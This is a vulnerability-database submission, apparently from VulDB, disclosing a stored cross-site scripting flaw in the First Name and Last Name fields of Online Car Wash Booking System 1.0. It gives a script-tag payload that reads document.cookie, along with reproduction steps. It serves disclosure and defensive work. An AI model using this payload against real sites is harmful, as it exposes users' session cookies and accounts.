| Titre | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Description | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user
3. In that "First Name" and " Last Name " parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| Utilisateur | Anonymous User |
|---|
| Soumission | 25/05/2024 15:19 (il y a 2 ans) |
|---|
| Modérer | 25/05/2024 20:27 (5 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name cross site scripting] |
|---|
| Points | 17 |
|---|